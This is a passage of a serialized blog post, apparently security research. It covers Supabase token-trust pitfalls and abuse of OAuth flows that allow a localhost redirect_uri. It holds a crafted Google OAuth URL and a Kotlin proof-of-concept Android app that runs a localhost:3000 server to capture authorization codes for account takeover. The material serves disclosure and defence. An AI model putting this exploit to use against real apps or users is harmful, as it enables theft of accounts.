}\n}\n",[77181],{"type":27,"tag":84,"props":77182,"children":77183},{"__ignoreMap":7},[77184,77209,77221,77290,77339,77387,77432,77455,77492,77508,77515],{"type":27,"tag":207,"props":77185,"children":77186},{"class":209,"line":210},[77187,77191,77196,77200,77205],{"type":27,"tag":207,"props":77188,"children":77189},{"style":214},[77190],{"type":33,"value":38637},{"type":27,"tag":207,"props":77192,"children":77193},{"style":1335},[77194],{"type":33,"value":77195}," parseSupaBase",{"type":27,"tag":207,"props":77197,"children":77198},{"style":238},[77199],{"type":33,"value":1343},{"type":27,"tag":207,"props":77201,"children":77202},{"style":220},[77203],{"type":33,"value":77204},"token",{"type":27,"tag":207,"props":77206,"children":77207},{"style":238},[77208],{"type":33,"value":1424},{"type":27,"tag":207,"props":77210,"children":77211},{"class":209,"line":244},[77212,77217],{"type":27,"tag":207,"props":77213,"children":77214},{"style":376},[77215],{"type":33,"value":77216}," try",{"type":27,"tag":207,"props":77218,"children":77219},{"style":238},[77220],{"type":33,"value":384},{"type":27,"tag":207,"props":77222,"children":77223},{"class":209,"line":270},[77224,77228,77232,77237,77241,77246,77250,77255,77259,77263,77268,77272,77277,77281,77286],{"type":27,"tag":207,"props":77225,"children":77226},{"style":214},[77227],{"type":33,"value":40159},{"type":27,"tag":207,"props":77229,"children":77230},{"style":238},[77231],{"type":33,"value":30305},{"type":27,"tag":207,"props":77233,"children":77234},{"style":220},[77235],{"type":33,"value":77236},"header",{"type":27,"tag":207,"props":77238,"children":77239},{"style":238},[77240],{"type":33,"value":1123},{"type":27,"tag":207,"props":77242,"children":77243},{"style":220},[77244],{"type":33,"value":77245},"payload",{"type":27,"tag":207,"props":77247,"children":77248},{"style":238},[77249],{"type":33,"value":1123},{"type":27,"tag":207,"props":77251,"children":77252},{"style":220},[77253],{"type":33,"value":77254},"signature",{"type":27,"tag":207,"props":77256,"children":77257},{"style":238},[77258],{"type":33,"value":15942},{"type":27,"tag":207,"props":77260,"children":77261},{"style":226},[77262],{"type":33,"value":10380},{"type":27,"tag":207,"props":77264,"children":77265},{"style":220},[77266],{"type":33,"value":77267}," token",{"type":27,"tag":207,"props":77269,"children":77270},{"style":238},[77271],{"type":33,"value":1041},{"type":27,"tag":207,"props":77273,"children":77274},{"style":1335},[77275],{"type":33,"value":77276},"split",{"type":27,"tag":207,"props":77278,"children":77279},{"style":238},[77280],{"type":33,"value":1343},{"type":27,"tag":207,"props":77282,"children":77283},{"style":1325},[77284],{"type":33,"value":77285},"'.'",{"type":27,"tag":207,"props":77287,"children":77288},{"style":238},[77289],{"type":33,"value":1455},{"type":27,"tag":207,"props":77291,"children":77292},{"class":209,"line":296},[77293,77297,77302,77306,77310,77314,77318,77322,77327,77331,77335],{"type":27,"tag":207,"props":77294,"children":77295},{"style":214},[77296],{"type":33,"value":40159},{"type":27,"tag":207,"props":77298,"children":77299},{"style":220},[77300],{"type":33,"value":77301}," decodedHeader",{"type":27,"tag":207,"props":77303,"children":77304},{"style":226},[77305],{"type":33,"value":229},{"type":27,"tag":207,"props":77307,"children":77308},{"style":220},[77309],{"type":33,"value":44777},{"type":27,"tag":207,"props":77311,"children":77312},{"style":238},[77313],{"type":33,"value":1041},{"type":27,"tag":207,"props":77315,"children":77316},{"style":1335},[77317],{"type":33,"value":46457},{"type":27,"tag":207,"props":77319,"children":77320},{"style":238},[77321],{"type":33,"value":1343},{"type":27,"tag":207,"props":77323,"children":77324},{"style":1335},[77325],{"type":33,"value":77326},"atob",{"type":27,"tag":207,"props":77328,"children":77329},{"style":238},[77330],{"type":33,"value":1343},{"type":27,"tag":207,"props":77332,"children":77333},{"style":220},[77334],{"type":33,"value":77236},{"type":27,"tag":207,"props":77336,"children":77337},{"style":238},[77338],{"type":33,"value":14505},{"type":27,"tag":207,"props":77340,"children":77341},{"class":209,"line":445},[77342,77346,77351,77355,77359,77363,77367,77371,77375,77379,77383],{"type":27,"tag":207,"props":77343,"children":77344},{"style":214},[77345],{"type":33,"value":40159},{"type":27,"tag":207,"props":77347,"children":77348},{"style":220},[77349],{"type":33,"value":77350}," decodedPayload",{"type":27,"tag":207,"props":77352,"children":77353},{"style":226},[77354],{"type":33,"value":229},{"type":27,"tag":207,"props":77356,"children":77357},{"style":220},[77358],{"type":33,"value":44777},{"type":27,"tag":207,"props":77360,"children":77361},{"style":238},[77362],{"type":33,"value":1041},{"type":27,"tag":207,"props":77364,"children":77365},{"style":1335},[77366],{"type":33,"value":46457},{"type":27,"tag":207,"props":77368,"children":77369},{"style":238},[77370],{"type":33,"value":1343},{"type":27,"tag":207,"props":77372,"children":77373},{"style":1335},[77374],{"type":33,"value":77326},{"type":27,"tag":207,"props":77376,"children":77377},{"style":238},[77378],{"type":33,"value":1343},{"type":27,"tag":207,"props":77380,"children":77381},{"style":220},[77382],{"type":33,"value":77245},{"type":27,"tag":207,"props":77384,"children":77385},{"style":238},[77386],{"type":33,"value":14505},{"type":27,"tag":207,"props":77388,"children":77389},{"class":209,"line":867},[77390,77394,77398,77403,77407,77411,77416,77420,77424,77428],{"type":27,"tag":207,"props":77391,"children":77392},{"style":376},[77393],{"type":33,"value":23019},{"type":27,"tag":207,"props":77395,"children":77396},{"style":238},[77397],{"type":33,"value":16862},{"type":27,"tag":207,"props":77399,"children":77400},{"style":220},[77401],{"type":33,"value":77402},"header:",{"type":27,"tag":207,"props":77404,"children":77405},{"style":220},[77406],{"type":33,"value":77301},{"type":27,"tag":207,"props":77408,"children":77409},{"style":238},[77410],{"type":33,"value":1123},{"type":27,"tag":207,"props":77412,"children":77413},{"style":220},[77414],{"type":33,"value":77415},"payload:",{"type":27,"tag":207,"props":77417,"children":77418},{"style":220},[77419],{"type":33,"value":77350},{"type":27,"tag":207,"props":77421,"children":77422},{"style":238},[77423],{"type":33,"value":1123},{"type":27,"tag":207,"props":77425,"children":77426},{"style":220},[77427],{"type":33,"value":77254},{"type":27,"tag":207,"props":77429,"children":77430},{"style":238},[77431],{"type":33,"value":25570},{"type":27,"tag":207,"props":77433,"children":77434},{"class":209,"line":892},[77435,77439,77443,77447,77451],{"type":27,"tag":207,"props":77436,"children":77437},{"style":238},[77438],{"type":33,"value":23054},{"type":27,"tag":207,"props":77440,"children":77441},{"style":376},[77442],{"type":33,"value":413},{"type":27,"tag":207,"props":77444,"children":77445},{"style":238},[77446],{"type":33,"value":686},{"type":27,"tag":207,"props":77448,"children":77449},{"style":220},[77450],{"type":33,"value":22138},{"type":27,"tag":207,"props":77452,"children":77453},{"style":238},[77454],{"type":33,"value":1424},{"type":27,"tag":207,"props":77456,"children":77457},{"class":209,"line":1475},[77458,77463,77467,77471,77475,77480,77484,77488],{"type":27,"tag":207,"props":77459,"children":77460},{"style":220},[77461],{"type":33,"value":77462}," console",{"type":27,"tag":207,"props":77464,"children":77465},{"style":238},[77466],{"type":33,"value":1041},{"type":27,"tag":207,"props":77468,"children":77469},{"style":1335},[77470],{"type":33,"value":22138},{"type":27,"tag":207,"props":77472,"children":77473},{"style":238},[77474],{"type":33,"value":1343},{"type":27,"tag":207,"props":77476,"children":77477},{"style":1325},[77478],{"type":33,"value":77479},"'Error parsing token:'",{"type":27,"tag":207,"props":77481,"children":77482},{"style":238},[77483],{"type":33,"value":1123},{"type":27,"tag":207,"props":77485,"children":77486},{"style":220},[77487],{"type":33,"value":22138},{"type":27,"tag":207,"props":77489,"children":77490},{"style":238},[77491],{"type":33,"value":1455},{"type":27,"tag":207,"props":77493,"children":77494},{"class":209,"line":2065},[77495,77499,77504],{"type":27,"tag":207,"props":77496,"children":77497},{"style":376},[77498],{"type":33,"value":23019},{"type":27,"tag":207,"props":77500,"children":77501},{"style":214},[77502],{"type":33,"value":77503}," null",{"type":27,"tag":207,"props":77505,"children":77506},{"style":238},[77507],{"type":33,"value":241},{"type":27,"tag":207,"props":77509,"children":77510},{"class":209,"line":2092},[77511],{"type":27,"tag":207,"props":77512,"children":77513},{"style":238},[77514],{"type":33,"value":10645},{"type":27,"tag":207,"props":77516,"children":77517},{"class":209,"line":2130},[77518],{"type":27,"tag":207,"props":77519,"children":77520},{"style":238},[77521],{"type":33,"value":451},{"type":27,"tag":58,"props":77523,"children":77524},{"id":47578},[77525],{"type":33,"value":47581},{"type":27,"tag":36,"props":77527,"children":77528},{},[77529,77531,77538,77540,77546],{"type":33,"value":77530},"Developers should avoid trusting input from their Supabase custom domain. ",{"type":27,"tag":47,"props":77532,"children":77535},{"href":77533,"rel":77534},"https://supabase.com/docs/guides/database/postgres/row-level-security",[51],[77536],{"type":33,"value":77537},"Row-Level Security",{"type":33,"value":77539}," (RLS) on Supabase should be enforced, plus important and private fields should be defined in ",{"type":27,"tag":84,"props":77541,"children":77543},{"className":77542},[],[77544],{"type":33,"value":77545},"app_metadata",{"type":33,"value":77547},". These fields must be strictly validated at every step of their creation and update processes.",{"type":27,"tag":28,"props":77549,"children":77551},{"id":77550},"oauth-in-development-environments",[77552],{"type":33,"value":77553},"OAuth in development environments",{"type":27,"tag":36,"props":77555,"children":77556},{},[77557,77559,77565,77567,77572],{"type":33,"value":77558},"After watching a ",{"type":27,"tag":47,"props":77560,"children":77563},{"href":77561,"rel":77562},"https://docs.google.com/presentation/d/1571_ZSOtfVat9u63zfn1ugTPZRN7pQsFIblcxci3czM/edit",[51],[77564],{"type":33,"value":7638},{"type":33,"value":77566}," by Luan Herrera on exploiting the logic of desktop apps that use OAuth for authentication (specifically using a localhost server), we noticed that many of our customers also permitted localhost within the ",{"type":27,"tag":84,"props":77568,"children":77570},{"className":77569},[],[77571],{"type":33,"value":76999},{"type":33,"value":77573}," parameter during the OAuth flow.",{"type":27,"tag":36,"props":77575,"children":77576},{},[77577,77579,77586],{"type":33,"value":77578},"Herrera's research highlights that if localhost is allowed as a redirect URI, it is generally not exploitable in a desktop environment because impersonating localhost without ",{"type":27,"tag":47,"props":77580,"children":77583},{"href":77581,"rel":77582},"https://www.cloudflare.com/learning/security/what-is-remote-code-execution/",[51],[77584],{"type":33,"value":77585},"Remote Code Execution",{"type":33,"value":77587}," (RCE) is impossible. However, the scenario changes in a mobile environment, where it is feasible to open a localhost web server using a malicious app, making exploitation possible.",{"type":27,"tag":36,"props":77589,"children":77590},{},[77591,77593,77599],{"type":33,"value":77592},"In one of our client's implementations, we identified that ",{"type":27,"tag":84,"props":77594,"children":77596},{"className":77595},[],[77597],{"type":33,"value":77598},"localhost:3000",{"type":33,"value":77600}," was permitted. The exploitation method is the same as demonstrated in Herrera's talk. However, we observed that localhost servers are frequently used and whitelisted by developers, not only for desktop applications but also for testing and development environments.",{"type":27,"tag":36,"props":77602,"children":77603},{},[77604],{"type":33,"value":77605},"For the exploitation, the final Google OAuth URL was constructed as follows:",{"type":27,"tag":101,"props":77607,"children":77611},{"className":77608,"code":77609,"language":77610,"meta":7,"style":7},"language-url shiki shiki-themes slack-dark","https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\n","url",[77612],{"type":27,"tag":84,"props":77613,"children":77614},{"__ignoreMap":7},[77615],{"type":27,"tag":207,"props":77616,"children":77617},{"class":209,"line":210},[77618],{"type":27,"tag":207,"props":77619,"children":77620},{},[77621],{"type":33,"value":77609},{"type":27,"tag":36,"props":77623,"children":77624},{},[77625],{"type":33,"value":77626},"Since there was no public exploit, we also created a proof of concept demonstrating how a malicious APK can be created to steal the OAuth token simply by opening the malicious app. This occurs without any user interaction and results in account takeover.",{"type":27,"tag":101,"props":77628,"children":77632},{"className":77629,"code":77630,"language":77631,"meta":7,"style":7},"language-kotlin shiki shiki-themes slack-dark","class MainActivity : AppCompatActivity() {\n\n override fun onCreate(savedInstanceState: Bundle?) {\n super.onCreate(savedInstanceState)\n\n // Start the Ktor web server\n CoroutineScope(Dispatchers.IO).launch {\n try {\n startWebServer()\n Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n } catch (e: Exception) {\n Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n }\n }\n\n // Open the Google OAuth page\n val googleOAuthUrl = \"https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\"\n val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(googleOAuthUrl))\n startActivity(browserIntent)\n }\n\n private fun startWebServer() {\n embeddedServer(CIO, port = 3000) {\n routing {\n get(\"{...}\") {\n call.respondHtml {\n head {\n meta(charset = \"UTF-8\")\n meta(name = \"viewport\", content = \"width=device-width, initial-scale=1.0\")\n title(\"OAuth Redirect\")\n }\n body {\n h1 { +\"Google OAuth Redirect\" }\n script {\n +\"document.body.innerText = location.search;\"\n }\n }\n }\n }\n }\n }.start(wait = true)\n }\n}\n","kotlin",[77633],{"type":27,"tag":84,"props":77634,"children":77635},{"__ignoreMap":7},[77636,77663,77670,77702,77724,77731,77739,77761,77773,77785,77820,77846,77896,77903,77910,77917,77925,77947,77982,77995,78002,78009,78030,78056,78068,78089,78106,78118,78144,78183,78204,78212,78224,78249,78261,78274,78282,78289,78297,78305,78312,78341,78348],{"type":27,"tag":207,"props":77637,"children":77638},{"class":209,"line":210},[77639,77644,77649,77654,77659],{"type":27,"tag":207,"props":77640,"children":77641},{"style":214},[77642],{"type":33,"value":77643},"class",{"type":27,"tag":207,"props":77645,"children":77646},{"style":8920},[77647],{"type":33,"value":77648}," MainActivity",{"type":27,"tag":207,"props":77650,"children":77651},{"style":238},[77652],{"type":33,"value":77653}," : ",{"type":27,"tag":207,"props":77655,"children":77656},{"style":8920},[77657],{"type":33,"value":77658},"AppCompatActivity",{"type":27,"tag":207,"props":77660,"children":77661},{"style":238},[77662],{"type":33,"value":23011},{"type":27,"tag":207,"props":77664,"children":77665},{"class":209,"line":244},[77666],{"type":27,"tag":207,"props":77667,"children":77668},{"emptyLinePlaceholder":19},[77669],{"type":33,"value":2062},{"type":27,"tag":207,"props":77671,"children":77672},{"class":209,"line":270},[77673,77678,77682,77687,77692,77697],{"type":27,"tag":207,"props":77674,"children":77675},{"style":214},[77676],{"type":33,"value":77677}," override",{"type":27,"tag":207,"props":77679,"children":77680},{"style":214},[77681],{"type":33,"value":13489},{"type":27,"tag":207,"props":77683,"children":77684},{"style":1335},[77685],{"type":33,"value":77686}," onCreate",{"type":27,"tag":207,"props":77688,"children":77689},{"style":238},[77690],{"type":33,"value":77691},"(savedInstanceState: ",{"type":27,"tag":207,"props":77693,"children":77694},{"style":8920},[77695],{"type":33,"value":77696},"Bundle",{"type":27,"tag":207,"props":77698,"children":77699},{"style":238},[77700],{"type":33,"value":77701},"?) {\n",{"type":27,"tag":207,"props":77703,"children":77704},{"class":209,"line":296},[77705,77710,77714,77719],{"type":27,"tag":207,"props":77706,"children":77707},{"style":214},[77708],{"type":33,"value":77709}," super",{"type":27,"tag":207,"props":77711,"children":77712},{"style":238},[77713],{"type":33,"value":1041},{"type":27,"tag":207,"props":77715,"children":77716},{"style":1335},[77717],{"type":33,"value":77718},"onCreate",{"type":27,"tag":207,"props":77720,"children":77721},{"style":238},[77722],{"type":33,"value":77723},"(savedInstanceState)\n",{"type":27,"tag":207,"props":77725,"children":77726},{"class":209,"line":445},[77727],{"type":27,"tag":207,"props":77728,"children":77729},{"emptyLinePlaceholder":19},[77730],{"type":33,"value":2062},{"type":27,"tag":207,"props":77732,"children":77733},{"class":209,"line":867},[77734],{"type":27,"tag":207,"props":77735,"children":77736},{"style":4647},[77737],{"type":33,"value":77738}," // Start the Ktor web server\n",{"type":27,"tag":207,"props":77740,"children":77741},{"class":209,"line":892},[77742,77747,77752,77757],{"type":27,"tag":207,"props":77743,"children":77744},{"style":1335},[77745],{"type":33,"value":77746}," CoroutineScope",{"type":27,"tag":207,"props":77748,"children":77749},{"style":238},[77750],{"type":33,"value":77751},"(Dispatchers.IO).",{"type":27,"tag":207,"props":77753,"children":77754},{"style":1335},[77755],{"type":33,"value":77756},"launch",{"type":27,"tag":207,"props":77758,"children":77759},{"style":238},[77760],{"type":33,"value":384},{"type":27,"tag":207,"props":77762,"children":77763},{"class":209,"line":1475},[77764,77769],{"type":27,"tag":207,"props":77765,"children":77766},{"style":376},[77767],{"type":33,"value":77768}," try",{"type":27,"tag":207,"props":77770,"children":77771},{"style":238},[77772],{"type":33,"value":384},{"type":27,"tag":207,"props":77774,"children":77775},{"class":209,"line":2065},[77776,77781],{"type":27,"tag":207,"props":77777,"children":77778},{"style":1335},[77779],{"type":33,"value":77780}," startWebServer",{"type":27,"tag":207,"props":77782,"children":77783},{"style":238},[77784],{"type":33,"value":15018},{"type":27,"tag":207,"props":77786,"children":77787},{"class":209,"line":2092},[77788,77793,77798,77802,77807,77811,77816],{"type":27,"tag":207,"props":77789,"children":77790},{"style":238},[77791],{"type":33,"value":77792}," Log.",{"type":27,"tag":207,"props":77794,"children":77795},{"style":1335},[77796],{"type":33,"value":77797},"d",{"type":27,"tag":207,"props":77799,"children":77800},{"style":238},[77801],{"type":33,"value":1343},{"type":27,"tag":207,"props":77803,"children":77804},{"style":1325},[77805],{"type":33,"value":77806},"\"WebServer\"",{"type":27,"tag":207,"props":77808,"children":77809},{"style":238},[77810],{"type":33,"value":1123},{"type":27,"tag":207,"props":77812,"children":77813},{"style":1325},[77814],{"type":33,"value":77815},"\"Server started on http://localhost:3000\"",{"type":27,"tag":207,"props":77817,"children":77818},{"style":238},[77819],{"type":33,"value":10449},{"type":27,"tag":207,"props":77821,"children":77822},{"class":209,"line":2130},[77823,77828,77832,77837,77842],{"type":27,"tag":207,"props":77824,"children":77825},{"style":238},[77826],{"type":33,"value":77827}," } ",{"type":27,"tag":207,"props":77829,"children":77830},{"style":214},[77831],{"type":33,"value":413},{"type":27,"tag":207,"props":77833,"children":77834},{"style":238},[77835],{"type":33,"value":77836}," (e: ",{"type":27,"tag":207,"props":77838,"children":77839},{"style":8920},[77840],{"type":33,"value":77841},"Exception",{"type":27,"tag":207,"props":77843,"children":77844},{"style":238},[77845],{"type":33,"value":1424},{"type":27,"tag":207,"props":77847,"children":77848},{"class":209,"line":2168},[77849,77853,77857,77861,77865,77869,77874,77878,77883,77887,77891],{"type":27,"tag":207,"props":77850,"children":77851},{"style":238},[77852],{"type":33,"value":77792},{"type":27,"tag":207,"props":77854,"children":77855},{"style":1335},[77856],{"type":33,"value":1419},{"type":27,"tag":207,"props":77858,"children":77859},{"style":238},[77860],{"type":33,"value":1343},{"type":27,"tag":207,"props":77862,"children":77863},{"style":1325},[77864],{"type":33,"value":77806},{"type":27,"tag":207,"props":77866,"children":77867},{"style":238},[77868],{"type":33,"value":1123},{"type":27,"tag":207,"props":77870,"children":77871},{"style":1325},[77872],{"type":33,"value":77873},"\"Error starting server: ",{"type":27,"tag":207,"props":77875,"children":77876},{"style":214},[77877],{"type":33,"value":41364},{"type":27,"tag":207,"props":77879,"children":77880},{"style":226},[77881],{"type":33,"value":77882},"e.message",{"type":27,"tag":207,"props":77884,"children":77885},{"style":214},[77886],{"type":33,"value":41396},{"type":27,"tag":207,"props":77888,"children":77889},{"style":1325},[77890],{"type":33,"value":27331},{"type":27,"tag":207,"props":77892,"children":77893},{"style":238},[77894],{"type":33,"value":77895},", e)\n",{"type":27,"tag":207,"props":77897,"children":77898},{"class":209,"line":4095},[77899],{"type":27,"tag":207,"props":77900,"children":77901},{"style":238},[77902],{"type":33,"value":66118},{"type":27,"tag":207,"props":77904,"children":77905},{"class":209,"line":4103},[77906],{"type":27,"tag":207,"props":77907,"children":77908},{"style":238},[77909],{"type":33,"value":10637},{"type":27,"tag":207,"props":77911,"children":77912},{"class":209,"line":4154},[77913],{"type":27,"tag":207,"props":77914,"children":77915},{"emptyLinePlaceholder":19},[77916],{"type":33,"value":2062},{"type":27,"tag":207,"props":77918,"children":77919},{"class":209,"line":4203},[77920],{"type":27,"tag":207,"props":77921,"children":77922},{"style":4647},[77923],{"type":33,"value":77924}," // Open the Google OAuth page\n",{"type":27,"tag":207,"props":77926,"children":77927},{"class":209,"line":4249},[77928,77933,77938,77942],{"type":27,"tag":207,"props":77929,"children":77930},{"style":214},[77931],{"type":33,"value":77932}," val",{"type":27,"tag":207,"props":77934,"children":77935},{"style":238},[77936],{"type":33,"value":77937}," googleOAuthUrl ",{"type":27,"tag":207,"props":77939,"children":77940},{"style":226},[77941],{"type":33,"value":10380},{"type":27,"tag":207,"props":77943,"children":77944},{"style":1325},[77945],{"type":33,"value":77946}," \"https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\"\n",{"type":27,"tag":207,"props":77948,"children":77949},{"class":209,"line":4290},[77950,77954,77959,77963,77968,77973,77977],{"type":27,"tag":207,"props":77951,"children":77952},{"style":214},[77953],{"type":33,"value":77932},{"type":27,"tag":207,"props":77955,"children":77956},{"style":238},[77957],{"type":33,"value":77958}," browserIntent ",{"type":27,"tag":207,"props":77960,"children":77961},{"style":226},[77962],{"type":33,"value":10380},{"type":27,"tag":207,"props":77964,"children":77965},{"style":1335},[77966],{"type":33,"value":77967}," Intent",{"type":27,"tag":207,"props":77969,"children":77970},{"style":238},[77971],{"type":33,"value":77972},"(Intent.ACTION_VIEW, Uri.",{"type":27,"tag":207,"props":77974,"children":77975},{"style":1335},[77976],{"type":33,"value":46457},{"type":27,"tag":207,"props":77978,"children":77979},{"style":238},[77980],{"type":33,"value":77981},"(googleOAuthUrl))\n",{"type":27,"tag":207,"props":77983,"children":77984},{"class":209,"line":4304},[77985,77990],{"type":27,"tag":207,"props":77986,"children":77987},{"style":1335},[77988],{"type":33,"value":77989}," startActivity",{"type":27,"tag":207,"props":77991,"children":77992},{"style":238},[77993],{"type":33,"value":77994},"(browserIntent)\n",{"type":27,"tag":207,"props":77996,"children":77997},{"class":209,"line":5466},[77998],{"type":27,"tag":207,"props":77999,"children":78000},{"style":238},[78001],{"type":33,"value":10645},{"type":27,"tag":207,"props":78003,"children":78004},{"class":209,"line":5530},[78005],{"type":27,"tag":207,"props":78006,"children":78007},{"emptyLinePlaceholder":19},[78008],{"type":33,"value":2062},{"type":27,"tag":207,"props":78010,"children":78011},{"class":209,"line":7900},[78012,78017,78021,78026],{"type":27,"tag":207,"props":78013,"children":78014},{"style":214},[78015],{"type":33,"value":78016}," private",{"type":27,"tag":207,"props":78018,"children":78019},{"style":214},[78020],{"type":33,"value":13489},{"type":27,"tag":207,"props":78022,"children":78023},{"style":1335},[78024],{"type":33,"value":78025}," startWebServer",{"type":27,"tag":207,"props":78027,"children":78028},{"style":238},[78029],{"type":33,"value":23011},{"type":27,"tag":207,"props":78031,"children":78032},{"class":209,"line":7909},[78033,78038,78043,78047,78052],{"type":27,"tag":207,"props":78034,"children":78035},{"style":1335},[78036],{"type":33,"value":78037}," embeddedServer",{"type":27,"tag":207,"props":78039,"children":78040},{"style":238},[78041],{"type":33,"value":78042},"(CIO, port ",{"type":27,"tag":207,"props":78044,"children":78045},{"style":226},[78046],{"type":33,"value":10380},{"type":27,"tag":207,"props":78048,"children":78049},{"style":232},[78050],{"type":33,"value":78051}," 3000",{"type":27,"tag":207,"props":78053,"children":78054},{"style":238},[78055],{"type":33,"value":1424},{"type":27,"tag":207,"props":78057,"children":78058},{"class":209,"line":7917},[78059,78064],{"type":27,"tag":207,"props":78060,"children":78061},{"style":1335},[78062],{"type":33,"value":78063}," routing",{"type":27,"tag":207,"props":78065,"children":78066},{"style":238},[78067],{"type":33,"value":384},{"type":27,"tag":207,"props":78069,"children":78070},{"class":209,"line":7926},[78071,78076,78080,78085],{"type":27,"tag":207,"props":78072,"children":78073},{"style":214},[78074],{"type":33,"value":78075}," get",{"type":27,"tag":207,"props":78077,"children":78078},{"style":238},[78079],{"type":33,"value":1343},{"type":27,"tag":207,"props":78081,"children":78082},{"style":1325},[78083],{"type":33,"value":78084},"\"{...}\"",{"type":27,"tag":207,"props":78086,"children":78087},{"style":238},[78088],{"type":33,"value":1424},{"type":27,"tag":207,"props":78090,"children":78091},{"class":209,"line":7934},[78092,78097,78102],{"type":27,"tag":207,"props":78093,"children":78094},{"style":238},[78095],{"type":33,"value":78096}," call.",{"type":27,"tag":207,"props":78098,"children":78099},{"style":1335},[78100],{"type":33,"value":78101},"respondHtml",{"type":27,"tag":207,"props":78103,"children":78104},{"style":238},[78105],{"type":33,"value":384},{"type":27,"tag":207,"props":78107,"children":78108},{"class":209,"line":7943},[78109,78114],{"type":27,"tag":207,"props":78110,"children":78111},{"style":1335},[78112],{"type":33,"value":78113}," head",{"type":27,"tag":207,"props":78115,"children":78116},{"style":238},[78117],{"type":33,"value":384},{"type":27,"tag":207,"props":78119,"children":78120},{"class":209,"line":7952},[78121,78126,78131,78135,78140],{"type":27,"tag":207,"props":78122,"children":78123},{"style":1335},[78124],{"type":33,"value":78125}," meta",{"type":27,"tag":207,"props":78127,"children":78128},{"style":238},[78129],{"type":33,"value":78130},"(charset ",{"type":27,"tag":207,"props":78132,"children":78133},{"style":226},[78134],{"type":33,"value":10380},{"type":27,"tag":207,"props":78136,"children":78137},{"style":1325},[78138],{"type":33,"value":78139}," \"UTF-8\"",{"type":27,"tag":207,"props":78141,"children":78142},{"style":238},[78143],{"type":33,"value":10449},{"type":27,"tag":207,"props":78145,"children":78146},{"class":209,"line":7961},[78147,78151,78156,78160,78165,78170,78174,78179],{"type":27,"tag":207,"props":78148,"children":78149},{"style":1335},[78150],{"type":33,"value":78125},{"type":27,"tag":207,"props":78152,"children":78153},{"style":238},[78154],{"type":33,"value":78155},"(name ",{"type":27,"tag":207,"props":78157,"children":78158},{"style":226},[78159],{"type":33,"value":10380},{"type":27,"tag":207,"props":78161,"children":78162},{"style":1325},[78163],{"type":33,"value":78164}," \"viewport\"",{"type":27,"tag":207,"props":78166,"children":78167},{"style":238},[78168],{"type":33,"value":78169},", content ",{"type":27,"tag":207,"props":78171,"children":78172},{"style":226},[78173],{"type":33,"value":10380},{"type":27,"tag":207,"props":78175,"children":78176},{"style":1325},[78177],{"type":33,"value":78178}," \"width=device-width, initial-scale=1.0\"",{"type":27,"tag":207,"props":78180,"children":78181},{"style":238},[78182],{"type":33,"value":10449},{"type":27,"tag":207,"props":78184,"children":78185},{"class":209,"line":7969},[78186,78191,78195,78200],{"type":27,"tag":207,"props":78187,"children":78188},{"style":1335},[78189],{"type":33,"value":78190}," title",{"type":27,"tag":207,"props":78192,"children":78193},{"style":238},[78194],{"type":33,"value":1343},{"type":27,"tag":207,"props":78196,"children":78197},{"style":1325},[78198],{"type":33,"value":78199},"\"OAuth Redirect\"",{"type":27,"tag":207,"props":78201,"children":78202},{"style":238},[78203],{"type":33,"value":10449},{"type":27,"tag":207,"props":78205,"children":78206},{"class":209,"line":7978},[78207],{"type":27,"tag":207,"props":78208,"children":78209},{"style":238},[78210],{"type":33,"value":78211}," }\n",{"type":27,"tag":207,"props":78213,"children":78214},{"class":209,"line":7987},[78215,78220],{"type":27,"tag":207,"props":78216,"children":78217},{"style":1335},[78218],{"type":33,"value":78219}," body",{"type":27,"tag":207,"props":78221,"children":78222},{"style":238},[78223],{"type":33,"value":384},{"type":27,"tag":207,"props":78225,"children":78226},{"class":209,"line":7996},[78227,78232,78236,78240,78245],{"type":27,"tag":207,"props":78228,"children":78229},{"style":1335},[78230],{"type":33,"value":78231}," h1",{"type":27,"tag":207,"props":78233,"children":78234},{"style":238},[78235],{"type":33,"value":16862},{"type":27,"tag":207,"props":78237,"children":78238},{"style":226},[78239],{"type":33,"value":2227},{"type":27,"tag":207,"props":78241,"children":78242},{"style":1325},[78243],{"type":33,"value":78244},"\"Google OAuth Redirect\"",{"type":27,"tag":207,"props":78246,"children":78247},{"style":238},[78248],{"type":33,"value":16872},{"type":27,"tag":207,"props":78250,"children":78251},{"class":209,"line":8005},[78252,78257],{"type":27,"tag":207,"props":78253,"children":78254},{"style":1335},[78255],{"type":33,"value":78256}," script",{"type":27,"tag":207,"props":78258,"children":78259},{"style":238},[78260],{"type":33,"value":384},{"type":27,"tag":207,"props":78262,"children":78263},{"class":209,"line":8013},[78264,78269],{"type":27,"tag":207,"props":78265,"children":78266},{"style":226},[78267],{"type":33,"value":78268}," +",{"type":27,"tag":207,"props":78270,"children":78271},{"style":1325},[78272],{"type":33,"value":78273},"\"document.body.innerText = location.search;\"\n",{"type":27,"tag":207,"props":78275,"children":78276},{"class":209,"line":8021},[78277],{"type":27,"tag":207,"props":78278,"children":78279},{"style":238},[78280],{"type":33,"value":78281}," 